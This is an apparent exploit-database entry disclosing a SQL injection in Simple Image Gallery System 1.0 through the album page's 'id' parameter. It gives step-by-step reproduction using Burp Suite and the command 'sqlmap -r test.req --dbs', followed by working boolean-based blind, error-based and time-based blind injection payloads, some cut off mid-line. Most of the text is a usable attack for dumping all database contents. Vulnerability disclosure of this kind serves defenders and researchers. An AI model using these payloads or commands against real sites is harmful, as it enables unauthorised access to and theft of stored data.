# Exploit Title: Simple Image Gallery System 1.0 - 'id' SQL Injection  
# Date: 2020-08-12  
# Exploit Author: Azumah Foresight Xorlali (M4sk0ff)  
# Vendor Homepage:  
# Software Link:  
# Version: Version 1.0  
# Category: Web Application  
# Tested on: Kali Linux  
Simple Image Gallery System 1.0 application is vulnerable to  
SQL injection via the "id" parameter on the album page.  
Step 1. Login to the application with any verified user credentials  
Step 2. Click on Albums page and select an albums if created or create  
by clicking on "Add New" on the top right and select the album.  
Step 3. Click on an image and capture the request in burpsuite.  
Now copy the request and save it as test.req .  
Step 4. Run the sqlmap command "sqlmap -r test.req --dbs  
Step 5. This will inject successfully and you will have an information  
disclosure of all databases contents.  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: id=3' OR (SELECT 9448 FROM(SELECT  
(ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND